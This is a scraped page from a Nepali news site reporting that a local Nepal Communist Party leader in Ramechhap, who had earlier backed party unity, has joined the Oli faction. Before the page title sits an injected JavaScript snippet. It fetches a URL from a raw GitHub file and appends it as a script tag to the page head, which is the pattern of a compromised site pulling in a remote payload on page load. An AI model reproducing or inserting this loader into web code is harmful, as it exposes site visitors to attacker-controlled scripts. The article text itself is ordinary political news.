;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेकपा बिबाद : एकताको पक्षमा उभिएका अध्यक्षनै ओली तिर लागेपछि……… – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेकपा बिबाद : एकताको पक्षमा उभिएका अध्यक्षनै ओली तिर लागेपछि………
देश/प्रदेश

नेकपा बिबाद : एकताको पक्षमा उभिएका अध्यक्षनै ओली तिर लागेपछि………

फागुन २०,

रामेछाप । नेपाल कम्युनिष्ट पार्टी (नेकपा) गोकुलगंगा गाउँपालिका कमिटीका अध्यक्ष समेत रहेका नेता खड्क सुनुवार ओली पक्षमा लागेका छन् । संसद् बिघटन भएपछि दुई टुक्रा बनेको नेकपालाई एकता बद्ध गर्नु पर्ने धारणा राख्दै कुनै आएका सुनुवार एका-एक ओली समूहमा लागेका हुन् ।

उनले ओली समूहमा लागेसंगै “अब कम्युनिष्ट पार्टी खाडलतिर उन्मुख भयाे कमरेड हाे,चेतनाभया” भन्दै आफ्नो धारण सार्वजनिक गरेका छन् ।  पार्टी एकताको पक्षमा खरो रुपमा प्रस्तुत हुदै आएका सुनुवार नेकपा रामेछापका जिल्ला कमिटीका सदस्य समेत हुन् ।

बुधबार सबेको ओली समुहको गाउँ कमिटीको बैठकको अध्यक्षता उनले नै गरेका छन् ।

ओली समूहको भेला तस्विरमा…..

फेसबुक प्रतिक्रियाहरु